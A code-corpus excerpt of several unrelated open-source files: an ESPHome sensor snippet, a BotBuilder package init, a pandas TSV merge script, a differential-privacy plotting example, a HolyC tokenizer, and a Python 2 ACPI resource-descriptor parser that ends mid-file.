cg.add(var.set_humidity_sensor(sens))
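# A hypothetical ESPHome YAML snippet this schema would accept (pin numbers and
# entity names are illustrative only):
#   sensor:
#     - platform: zyaura
#       clock_pin: GPIO5
#       data_pin: GPIO4
#       co2:
#         name: "ZyAura CO2"
#       temperature:
#         name: "ZyAura Temperature"
#       humidity:
#         name: "ZyAura Humidity"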
|
samples/python/15.handling-attachments/bots/__init__.py
|
Aliacf21/BotBuilder-Samples
| 1,998 |
117216
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
from .attachments_bot import AttachmentsBot
__all__ = ["AttachmentsBot"]
|
src/scripts/merge_pandas_conll.py
|
acoli-repo/OpenIE_Stanovsky_Dagan
| 117 |
117220
|
""" Usage:
merge_pandas_conll --out=OUTPUT_FN <filenames>...
Merge a list of data frames in csv format and print to output file.
"""
from docopt import docopt
import pandas as pd
import logging
logging.basicConfig(level = logging.DEBUG)
if __name__ == "__main__":
args = docopt(__doc__)
logging.debug(args)
input_fns = args["<filenames>"]
out_fn = args["--out"]
pd.concat([pd.read_csv(fn,
sep = '\t',
header = 0)
for fn in input_fns]).to_csv(out_fn,
sep = '\t',
header = True,
index = False)
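# Example invocation (file names are illustrative only):
#   python merge_pandas_conll.py --out=merged.tsv part1.tsv part2.tsv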
|
example/example_puredp.py
|
samellem/autodp
| 158 |
117226
|
from autodp.mechanism_zoo import PureDP_Mechanism
from autodp.transformer_zoo import Composition
# Example: pure DP mechanism and composition of it
eps = 0.3
mech = PureDP_Mechanism(eps, name='Laplace')
import matplotlib.pyplot as plt
fpr_list, fnr_list = mech.plot_fDP()
plt.figure(1)
plt.plot(fpr_list,fnr_list,label='fdp_of_laplace')
delta = 1e-6
epslist = [mech.get_approxDP(delta)]
# declare a transformation to handle composition
compose = Composition()
for i in range(2,11):
mech_composed = compose([mech], [i])
epslist.append(mech_composed.get_approxDP(delta))
fpr_list, fnr_list = mech_composed.plot_fDP()
plt.plot(fpr_list, fnr_list, label='fdp_of_'+str(i)+'laplace')
plt.legend()
plt.xlabel('Type I error')
plt.ylabel('Type II error')
plt.show()
# we could specify parameters of the composition, e.g. using RDP composition, using KOV and so on
plt.figure(2)
plt.plot(range(1,11),epslist)
plt.xlabel('number of times compose')
plt.ylabel(r'$\epsilon$ at $\delta = 1e-6$')
plt.show()
|
secularize/token.py
|
PlutNom/HolyC-for-Linux
| 266 |
117305
|
from json import load, dumps
from .utils import populate_ast
class TokenStream(object):
def __init__(self, input_):
self.input = input_
self.current = None
self.keywords = 'if then else true false'.split()
self.datatypes = ['U0', 'U8', 'U16', 'U32', 'U64',
'I8', 'I16', 'I32', 'I64', 'F64']
self.tokens = list()
self.direct_trans = {
'Print': 'printf',
'U0': 'void',
'U8': 'unsigned char',
'U16': 'unsigned short',
'U32': 'unsigned int',
'U64': 'unsigned long',
'I8': 'char',
'I16': 'short',
'I32': 'int',
'I64': 'long',
'F64': 'double'
}
def croak(self, message):
return self.input.croak(message + f'{dumps(self.tokens, indent=2)}')
def is_keyword(self, word):
return word in self.keywords
def is_datatype(self, word):
return word in self.datatypes
def is_digit(self, ch):
try:
int(ch)
return True
except (ValueError, TypeError):
return False
def is_id_start(self, ch):
try:
return ch.isalpha()
except AttributeError:
return False
def is_id(self, ch):
return self.is_id_start(ch) or ch in '?!-<>=0123456789'
def is_op_char(self, ch):
return ch in '+-*/%=&|<>!'
def is_punc(self, ch):
return ch in ',;(){}[]'
def is_whitespace(self, ch):
return ch in ' _\t_\n'.split('_')
def is_being_declared(self):
return self.tokens and self.tokens[-1].get('type') != 'datatype'
def is_not_builtin(self, id_):
return id_ not in self.direct_trans
def read_while(self, predicate):
string = str()
while not self.input.eof() and predicate(self.input.peek()):
string += self.input.next()
return string
def read_while_prev(self, predicate):
string = str()
line = self.input.line
col = self.input.col
while not self.input.bof() and predicate(self.input.peek_prev()):
string += self.input.prev()
self.input.line = line
self.input.col = col
return string[::-1]
    def read_number(self):
        # Allow at most one decimal point; `nonlocal` is needed so the flag set
        # inside the predicate persists across calls to it.
        has_dot = False
        def anon(ch):
            nonlocal has_dot
            if ch == '.':
                if has_dot:
                    return False
                has_dot = True
                return True
            return self.is_digit(ch)
        number = self.read_while(anon)
try:
number = int(number)
except ValueError:
number = float(number)
self.tokens.append({
'type': 'num',
'value': number
})
return self.tokens[-1]
def read_function(self, name, prog, type_=['int']):
coord = f'{self.input.filename}:{self.input.line}'
return populate_ast(self, 'funcdef', **{
'coord': coord,
'body.coord': coord,
'body.block_items': prog,
'decl.name': name,
'decl.coord': coord,
'decl.type.coord': coord,
'decl.type.type.coord': coord,
'decl.type.type.declname': name,
'decl.type.type.type.names': type_,
'decl.type.type.type.coord': coord
})
def read_ident(self):
coord = f'{self.input.filename}:{self.input.line}'
id_ = self.read_while(self.is_id)
type_ = str()
# print(f'id: {id_}')
if self.is_keyword(id_):
type_ = 'kw'
elif self.is_datatype(id_):
type_ = 'datatype'
self.direct_trans[f'{id_}*'] = f'{self.direct_trans[id_]}*'
maybe_pointer = self.read_while(lambda ch: ch in [' ', '*'])\
.replace(' ', str())
if maybe_pointer:
id_ += maybe_pointer
elif self.is_being_declared() and self.is_not_builtin(id_):
# print(f"creating var out of {id_}")
return populate_ast(self, 'id', **{
'name': id_,
'coord': coord
})
else:
# function definition
if self.tokens and self.tokens[-1].get('type') == 'datatype' and\
self.peek()['value'] == '(':
return self.read_function(id_, list())
# function call
if self.peek()['value'] == '(':
return populate_ast(self, 'funccall', **{
'coord': coord,
'name.name': self.direct_trans.get(id_, id_),
'name.coord': coord,
'args.coord': coord,
'args.exprs.coord': coord
})
# function/variable declaration
return populate_ast(self, 'decl', **{
'name': id_,
'coord': coord,
'type.declname': id_,
'type.coord': coord,
'type.type.names': list(),
'type.type.coord': coord,
'init.coord': coord
})
self.tokens.append({
'type': type_,
'value': self.direct_trans.get(id_, id_)
})
return self.tokens[-1]
def read_escaped(self, end):
escaped = False
string = str()
self.input.next()
while not self.input.eof():
ch = self.input.next()
if ch == end:
break
string += ch
# if escaped:
# string += ch
# escaped = False
# elif ch == '\\':
# escaped = True
# elif ch == end:
# break
# else:
# string += ch
return f'"{string}"'
def read_string(self):
self.tokens.append({
"_nodetype": "Constant",
"type": "string",
"value": self.read_escaped('"'),
"coord": "examples/math.c:3:16"
})
# print(f'found string: {self.tokens[-1]}')
# self.tokens.append({
# 'type': 'str',
# 'value': self.read_escaped('"')
# })
return self.tokens[-1]
def skip_comment(self):
self.read_while(lambda ch: ch != "\n")
self.input.next()
def read_next(self):
self.read_while(self.is_whitespace)
if self.input.eof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
return self.tokens[-1]
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def read_prev(self):
self.read_while_prev(self.is_whitespace)
if self.input.bof():
return None
ch = self.input.peek()
if ch == "//":
self.skip_comment()
return self.read_next()
if ch == '"':
return self.read_string()
if self.is_digit(ch):
return self.read_number()
if self.is_id_start(ch):
return self.read_ident()
if self.is_punc(ch):
self.tokens.append({
'type': 'punc',
'value': self.input.next()
})
            return self.tokens[-1]
if self.is_op_char(ch):
self.tokens.append({
'type': 'op',
'value': self.read_while(self.is_op_char)
})
return self.tokens[-1]
self.input.croak(f'Can\'t handle character: {ch}')
def peek(self):
if self.current:
return self.current
self.current = self.read_next()
return self.current
def next(self):
tok = self.current
self.current = None
return tok or self.read_next()
def prev(self):
return self.read_prev()
def eof(self):
return self.peek() is None
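# A minimal driving-loop sketch for TokenStream (assumes an input-stream object
# exposing the peek/next/prev/eof/croak interface used above; names are
# illustrative only):
#   stream = TokenStream(input_stream)
#   while not stream.eof():
#       token = stream.next()  # a token dict or a populated AST node
#       ...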
|
python/acpi.py
|
3mdeb/bits
| 215 |
117319
|
# Copyright (c) 2015, Intel Corporation
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of Intel Corporation nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""ACPI module."""
import _acpi
import bits
import bits.cdata
import bits.pyfs
import bitfields
from cpudetect import cpulib
from collections import OrderedDict
import copy
from cStringIO import StringIO
import ctypes
from ctypes import *
import itertools
import os
import string
import struct
import ttypager
import unpack
def _id(v):
return v
class TableParseException(Exception): pass
class AcpiBuffer(str):
def __repr__(self):
return "AcpiBuffer(" + ' '.join("{:02x}".format(ord(c)) for c in self) + ")"
def __str__(self):
return repr(self)
def display_resources(name):
with ttypager.page():
for r in get_objpaths(name):
raw_descriptor = evaluate(r)
print r
print repr(raw_descriptor)
if raw_descriptor is None:
continue
for descriptor in parse_descriptor(raw_descriptor):
print descriptor
print
class small_resource(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('length', ctypes.c_uint8, 3),
('item_name', ctypes.c_uint8, 4),
('rtype', ctypes.c_uint8, 1),
]
class large_resource(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('item_name', ctypes.c_uint8, 7),
('rtype', ctypes.c_uint8, 1),
]
SMALL_RESOURCE, LARGE_RESOURCE = 0, 1
class resource_data(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("small_resource",)
_fields_ = [
('small_resource', small_resource),
('large_resource', large_resource),
]
def parse_descriptor(buf):
large_factory = [
parse_VendorDefinedLargeDescriptor,
parse_ExtendedInterruptDescriptor,
]
small_factory = [
parse_IRQDescriptor,
parse_StartDependentFunctionsDescriptor,
parse_VendorDefinedSmallDescriptor,
]
large_descriptor_dict = {
1 : Memory24BitRangeDescriptor,
2 : GenericRegisterDescriptor,
4 : parse_VendorDefinedLargeDescriptor,
5 : Memory32BitRangeDescriptor,
6 : FixedMemory32BitRangeDescriptor,
7 : DwordAddressSpaceDescriptor,
8 : WordAddressSpaceDescriptor,
9 : parse_ExtendedInterruptDescriptor,
0xA : QwordAddressSpaceDescriptor,
0xB : ExtendedAddressSpaceDescriptor,
0xC : None,
0xE : None,
}
small_descriptor_dict = {
4 : parse_IRQDescriptor,
5 : DMADescriptor,
6 : parse_StartDependentFunctionsDescriptor,
7 : EndDependentFunctionsDescriptor,
8 : IOPortDescriptor,
9 : FixedIOPortDescriptor,
0xA : FixedDMADescriptor,
0xE : parse_VendorDefinedSmallDescriptor,
0xF : EndTagDescriptor,
}
descriptors = list()
current = 0
end = len(buf)
while current < end:
cls = None
res = resource_data.from_buffer_copy(buf, current)
if res.rtype == LARGE_RESOURCE:
cls = large_descriptor_dict.get(res.large_resource.item_name)
elif res.rtype == SMALL_RESOURCE:
cls = small_descriptor_dict.get(res.small_resource.item_name)
if cls is not None:
if cls in large_factory or cls in small_factory:
descriptor = cls(buf[current:]).from_buffer_copy(buf, current)
else:
descriptor = cls.from_buffer_copy(buf, current)
current += descriptor.length
if res.rtype == LARGE_RESOURCE:
current += 3
elif res.rtype == SMALL_RESOURCE:
current += 1
descriptors.append(descriptor)
else:
return AcpiBuffer(buf[current:])
if len(descriptors):
return tuple(d for d in descriptors)
return buf
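# A usage sketch (the method path is illustrative only): feed parse_descriptor()
# an AcpiBuffer returned by evaluating a _CRS/_PRS method and it yields the
# descriptor structs defined below, much as display_resources() does above:
#   raw = evaluate("\\_SB.PCI0._CRS")
#   if isinstance(raw, AcpiBuffer):
#       for d in parse_descriptor(raw):
#           print d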
class IRQDescriptor2(bits.cdata.Struct):
"""IRQ Descriptor (Length=2)"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('_INT', ctypes.c_uint16),
]
_interrupt_sharing_wakes = {
0x0: "Exclusive",
0x1: "Shared",
0x2: "ExclusiveAndWake",
0x3: "SharedAndWake",
}
_interrupt_polarities = {
0: "Active-High",
1: "Active-Low",
}
_interrupt_modes = {
0 : "Level-Triggered",
1 : "Edge-Triggered",
}
class irq_information_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_HE', ctypes.c_uint8, 1),
('reserved', ctypes.c_uint8, 2),
('_LL', ctypes.c_uint8, 1),
('_SHR', ctypes.c_uint8, 2),
]
_formats = {
'_HE': unpack.format_table("{}", _interrupt_modes),
'_LL': unpack.format_table("{}", _interrupt_polarities),
'_SHR': unpack.format_table("{}", _interrupt_sharing_wakes),
}
class irq_information(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', irq_information_bits),
]
class IRQDescriptor3(bits.cdata.Struct):
"""IRQ Descriptor (Length=3)"""
_pack_ = 1
_fields_ = copy.copy(IRQDescriptor2._fields_) +[
('information', irq_information),
]
def parse_IRQDescriptor(buf):
des = small_resource.from_buffer_copy(buf)
if des.length == 2:
return IRQDescriptor2
return IRQDescriptor3
class dma_mask_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_SIZ', ctypes.c_uint8, 2),
('_BM', ctypes.c_uint8, 1),
('_TYP', ctypes.c_uint8, 2),
]
dma_types = {
0b00: "compatibility mode",
0b01: "Type A",
0b10: "Type B",
0b11: "Type F",
}
logical_device_bus_master_status = {
0: "Logical device is not a bus master",
1: "Logical device is a bus master",
}
transfer_type_preferences = {
0b00: "8-bit only",
0b01: "8- and 16-bit",
0b10: "16-bit only",
}
_formats = {
'_SIZ': unpack.format_table("{}", transfer_type_preferences),
'_BM': unpack.format_table("{}", logical_device_bus_master_status),
'_TYP': unpack.format_table("{}", dma_types),
}
class dma_mask(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', dma_mask_bits),
]
class DMADescriptor(bits.cdata.Struct):
"""DMA Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) +[
('_DMA', ctypes.c_uint8),
        ('mask', dma_mask),
]
class StartDependentFunctionsDescriptor0(bits.cdata.Struct):
"""Start Dependent Functions Descriptor (length=0)"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_)
class priority_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('compatibility_priority', ctypes.c_uint8, 2),
('performance_robustness', ctypes.c_uint8, 2),
]
configurations = {
0: "Good configuration",
1: "Acceptable configuration",
2: "Sub-optimal configuration",
}
_formats = {
'compatibility_priority': unpack.format_table("priority[1:0]={}", configurations),
'performance_robustness': unpack.format_table("priority[3:2]={}", configurations),
}
class priority(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', priority_bits),
]
class StartDependentFunctionsDescriptor1(bits.cdata.Struct):
"""Start Dependent Functions Descriptor (length=1)"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) +[
('priority', priority),
]
def parse_StartDependentFunctionsDescriptor(buf):
des = small_resource.from_buffer_copy(buf)
if des.length == 0:
return StartDependentFunctionsDescriptor0
return StartDependentFunctionsDescriptor1
class EndDependentFunctionsDescriptor(bits.cdata.Struct):
"""End Dependent Functions Descriptor"""
_fields_ = copy.copy(small_resource._fields_)
class ioport_information_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_DEC', ctypes.c_uint8, 1),
]
_dec_statuses = {
1 : "logical device decodes 16-bit addresses",
0 : "logical device only decodes address bits[9:0]",
}
_formats = {
'_DEC': unpack.format_table("{}", _dec_statuses),
}
class ioport_information(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', ioport_information_bits),
]
class IOPortDescriptor(bits.cdata.Struct):
"""I/O Port Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) +[
('ioport_information', ioport_information),
('_MIN', ctypes.c_uint16),
('_MAX', ctypes.c_uint16),
('_ALN', ctypes.c_uint8),
('_LEN', ctypes.c_uint8),
]
class FixedIOPortDescriptor(bits.cdata.Struct):
"""Fixed Location I/O Port Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('_BAS', ctypes.c_uint16),
('_LEN', ctypes.c_uint8),
]
class FixedDMADescriptor(bits.cdata.Struct):
"""Fixed DMA Descriptor"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('_DMA', ctypes.c_uint16),
('_TYPE', ctypes.c_uint16),
('_SIZ', ctypes.c_uint8),
]
_dma_transfer_widths = {
0x00: "8-bit",
0x01: "16-bit",
0x02: "32-bit",
0x03: "64-bit",
0x04: "128-bit",
0x05: "256-bit",
}
_formats = {
'_SIZ': unpack.format_table("DMA transfer width={}", _dma_transfer_widths),
}
def VendorDefinedSmallDescriptor_factory(num_vendor_bytes):
"""Vendor-Defined Descriptor"""
class VendorDefinedSmallDescriptor(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('vendor_byte_list', ctypes.c_uint8 * num_vendor_bytes),
]
return VendorDefinedSmallDescriptor
def parse_VendorDefinedSmallDescriptor(buf):
des = VendorDefinedSmallDescriptor_factory(0)
num_vendor_bytes = len(buf) - ctypes.sizeof(des)
return VendorDefinedSmallDescriptor_factory(num_vendor_bytes)
class EndTagDescriptor(bits.cdata.Struct):
"""End Tag"""
_pack_ = 1
_fields_ = copy.copy(small_resource._fields_) + [
('checksum', ctypes.c_uint8),
]
class memory_range_information_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('_RW', ctypes.c_uint8, 1),
]
_rw_statuses = {
1: "writeable (read/write)",
0: "non-writeable (read-only)",
}
_formats = {
'_RW': unpack.format_table("{}", _rw_statuses),
}
class memory_range_information(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', memory_range_information_bits),
]
class Memory24BitRangeDescriptor(bits.cdata.Struct):
"""Memory 24-Bit Range Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('information', memory_range_information),
('_MIN', ctypes.c_uint16),
('_MAX', ctypes.c_uint16),
('_ALN', ctypes.c_uint16),
('_LEN', ctypes.c_uint16),
]
def VendorDefinedLargeDescriptor_factory(num_vendor_bytes):
"""Vendor-Defined Descriptor"""
class VendorDefinedLargeDescriptor(bits.cdata.Struct):
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('uuid_sub_type', ctypes.c_uint8),
('uuid', bits.cdata.GUID),
('vendor_byte_list', ctypes.c_uint8 * num_vendor_bytes),
]
return VendorDefinedLargeDescriptor
def parse_VendorDefinedLargeDescriptor(buf):
des = VendorDefinedLargeDescriptor_factory(0)
num_vendor_bytes = len(buf) - ctypes.sizeof(des)
return VendorDefinedLargeDescriptor_factory(num_vendor_bytes)
class Memory32BitRangeDescriptor(bits.cdata.Struct):
"""32-Bit Memory Range Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('information', memory_range_information),
        ('_MIN', ctypes.c_uint32),
        ('_MAX', ctypes.c_uint32),
        ('_ALN', ctypes.c_uint32),
        ('_LEN', ctypes.c_uint32),
]
class FixedMemory32BitRangeDescriptor(bits.cdata.Struct):
"""32-Bit Fixed Memory Range Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('information', memory_range_information),
('_BAS', ctypes.c_uint32),
('_LEN', ctypes.c_uint32),
]
def _range_type_str(range_type):
if range_type >= 192 and range_type <= 255:
return 'OEM Defined'
_range_types = {
0: 'Memory range',
1: 'IO range',
2: 'Bus number range',
}
return _range_types.get(range_type, 'Reserved')
_decode_type = {
1: "bridge subtractively decodes (top level bridges only)",
0: "bridge positively decodes",
}
_min_address_fixed = {
1: "specified minimum address is fixed",
0: "specified minimum address is not fixed and can be changed",
}
_max_address_fixed = {
1: "specified maximum address is fixed",
0: "specified maximum address is not fixed",
}
class _resource_flags_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('reserved_0', ctypes.c_uint8, 1),
('_DEC', ctypes.c_uint8, 1),
('_MIF', ctypes.c_uint8, 1),
('_MAF', ctypes.c_uint8, 1),
        ('reserved_7_4', ctypes.c_uint8, 4),
]
_formats = {
'_DEC': unpack.format_table("{}", _decode_type),
'_MIF': unpack.format_table("{}", _min_address_fixed),
'_MAF': unpack.format_table("{}", _max_address_fixed),
}
class _resource_flags(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', _resource_flags_bits),
]
class DwordAddressSpaceDescriptor(bits.cdata.Struct):
"""DWord Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('range_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('address_space_granularity', ctypes.c_uint32),
('address_range_minimum', ctypes.c_uint32),
('address_range_maximum', ctypes.c_uint32),
('address_translation_offset', ctypes.c_uint32),
('address_length', ctypes.c_uint32),
]
_formats = {
'range_type': unpack.format_function("{:#x}", _range_type_str),
}
class WordAddressSpaceDescriptor(bits.cdata.Struct):
"""Word Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('range_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('address_space_granularity', ctypes.c_uint16),
('address_range_minimum', ctypes.c_uint16),
('address_range_maximum', ctypes.c_uint16),
('address_translation_offset', ctypes.c_uint16),
('address_length', ctypes.c_uint16),
]
_formats = {
'range_type': unpack.format_function("{:#x}", _range_type_str),
}
_consumer_producer = {
1: "device consumes this resource",
0: "device produces and consumes this resource",
}
class interrupt_vector_info_bits(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('consumer_producer', ctypes.c_uint8, 1),
('_HE', ctypes.c_uint8, 1),
('_LL', ctypes.c_uint8, 1),
('_SHR', ctypes.c_uint8, 2),
('reserved_7_5', ctypes.c_uint8, 3),
]
_formats = {
'consumer_producer': unpack.format_table("{}", _consumer_producer),
'_HE': unpack.format_table("{}", _interrupt_modes),
'_LL': unpack.format_table("{}", _interrupt_polarities),
'_SHR': unpack.format_table("{}", _interrupt_sharing_wakes),
}
class interrupt_vector_info(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint8),
('bits', interrupt_vector_info_bits),
]
def ExtendedInterruptDescriptor_factory(num_interrupts):
class ExtendedInterruptDescriptor(bits.cdata.Struct):
"""Extended Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('interrupt_vector_flags', interrupt_vector_info),
('interrupt_table_length', ctypes.c_uint8),
('interrupt_number', ctypes.c_uint32 * num_interrupts),
]
return ExtendedInterruptDescriptor
def parse_ExtendedInterruptDescriptor(buf):
res = ExtendedInterruptDescriptor_factory(0).from_buffer_copy(buf)
return ExtendedInterruptDescriptor_factory(res.interrupt_table_length)
class QwordAddressSpaceDescriptor(bits.cdata.Struct):
"""QWord Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('range_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('address_space_granularity', ctypes.c_uint64),
('address_range_minimum', ctypes.c_uint64),
('address_range_maximum', ctypes.c_uint64),
('address_translation_offset', ctypes.c_uint64),
('address_length', ctypes.c_uint64),
]
_formats = {
'range_type': unpack.format_function("{:#x}", _range_type_str)
}
class ExtendedAddressSpaceDescriptor(bits.cdata.Struct):
"""Extended Address Space Descriptor"""
_pack_ = 1
_fields_ = copy.copy(large_resource._fields_) + [
('length', ctypes.c_uint16),
('resource_type', ctypes.c_uint8),
('general_flags', _resource_flags),
('type_specific_flags', ctypes.c_uint8),
('revision_id', ctypes.c_uint8),
('reserved', ctypes.c_uint8),
('address_range_granularity', ctypes.c_uint64),
('address_range_minimum', ctypes.c_uint64),
('address_range_maximum', ctypes.c_uint64),
('address_translation_offset', ctypes.c_uint64),
('address_length', ctypes.c_uint64),
('type_specific_attribute', ctypes.c_uint64),
]
_formats = {
'resource_type': unpack.format_function("{:#x}", _range_type_str)
}
class AcpiLocalReference(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('ActualType', ctypes.c_uint32),
('NamePath', ctypes.c_char_p)
]
class _adr_pci(bits.cdata.Struct):
"""_ADR encoding for PCI bus"""
_pack_ = 1
_fields_ = [
('function', ctypes.c_uint32, 16),
('device', ctypes.c_uint32, 16),
]
class pci_address(bits.cdata.Union):
_pack_ = 1
_anonymous_ = ("bits",)
_fields_ = [
('data', ctypes.c_uint32),
('bits', _adr_pci),
]
class PciRoutingTablePIC(bits.cdata.Struct):
"""PCI Routing Table Entry using PIC mode"""
_pack_ = 1
_fields_ = [
('address', pci_address),
('pin', ctypes.c_uint8),
('source', ctypes.c_uint8),
('source_index', ctypes.c_uint32),
]
class PciRoutingTablePICgsi(bits.cdata.Struct):
"""PCI Routing Table Entry using PIC mode and specifying a Global System Interrupt (GSI)"""
_pack_ = 1
_fields_ = [
('address', pci_address),
('pin', ctypes.c_uint8),
('source', ctypes.c_uint8),
('global_system_interrupt', ctypes.c_uint32),
]
class PciRoutingTableAPIC(bits.cdata.Struct):
"""PCI Routing Table Entry using APIC mode"""
_pack_ = 1
_fields_ = [
('address', pci_address),
('pin', ctypes.c_uint8),
('source', AcpiLocalReference),
('source_index', ctypes.c_uint32),
]
def parse_prt(pkg):
"""Parse PCI Routing Table (PRT) Entries"""
if isinstance(pkg, tuple):
if len(pkg) == 4:
if isinstance(pkg[2], AcpiLocalReference):
return PciRoutingTableAPIC(pci_address(pkg[0]), *pkg[1:])
if issubclass(type(pkg[2]), (int, long)):
if pkg[2] == 0:
return PciRoutingTablePICgsi(pci_address(pkg[0]), *pkg[1:])
else:
return PciRoutingTablePIC(pci_address(pkg[0]), *pkg[1:])
return pkg
def make_prt(data):
if data is None:
return None
data = parse_prt(data)
if isinstance(data, tuple):
return tuple(make_prt(v) for v in data)
return data
def display_prt(name="_PRT"):
with ttypager.page():
for path in get_objpaths(name):
print path
for prt in make_prt(evaluate(path)):
print prt
print
class AcpiPower(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('SystemLevel', ctypes.c_uint32),
('ResourceOrder', ctypes.c_uint32)
]
class AcpiProcessor(bits.cdata.Struct):
_pack_ = 1
_fields_ = [
('ProcId', ctypes.c_uint32),
('PblkAddress', ctypes.c_uint64),
('PblkLength', ctypes.c_uint32),
]
# ACPI_OBJECT_TYPE values
assert _acpi.ACPI_TYPE_EXTERNAL_MAX == 16, "Internal error: ACPI_OBJECT_TYPE enumeration not updated for new ACPICA"
(
ACPI_TYPE_ANY,
ACPI_TYPE_INTEGER,
ACPI_TYPE_STRING,
ACPI_TYPE_BUFFER,
ACPI_TYPE_PACKAGE,
ACPI_TYPE_FIELD_UNIT,
ACPI_TYPE_DEVICE,
ACPI_TYPE_EVENT,
ACPI_TYPE_METHOD,
ACPI_TYPE_MUTEX,
ACPI_TYPE_REGION,
ACPI_TYPE_POWER,
ACPI_TYPE_PROCESSOR,
ACPI_TYPE_THERMAL,
ACPI_TYPE_BUFFER_FIELD,
ACPI_TYPE_DDB_HANDLE,
ACPI_TYPE_DEBUG_OBJECT,
) = range(_acpi.ACPI_TYPE_EXTERNAL_MAX + 1)
ACPI_TYPE_LOCAL_REFERENCE = 0x14
_acpi_object_types = {
ACPI_TYPE_INTEGER: _id,
ACPI_TYPE_STRING: _id,
ACPI_TYPE_BUFFER: AcpiBuffer,
ACPI_TYPE_PACKAGE: (lambda t: tuple(_acpi_object_to_python(v) for v in t)),
ACPI_TYPE_POWER: (lambda args: AcpiPower(*args)),
ACPI_TYPE_PROCESSOR: (lambda args: AcpiProcessor(*args)),
ACPI_TYPE_LOCAL_REFERENCE: (lambda args: AcpiLocalReference(*args)),
}
def _acpi_object_to_python(acpi_object):
if acpi_object is None:
return None
object_type, value = acpi_object
return _acpi_object_types[object_type](value)
def ctypes_to_python(data):
if data is None:
return None
if isinstance(data, (list, tuple)):
return tuple(ctypes_to_python(v) for v in data)
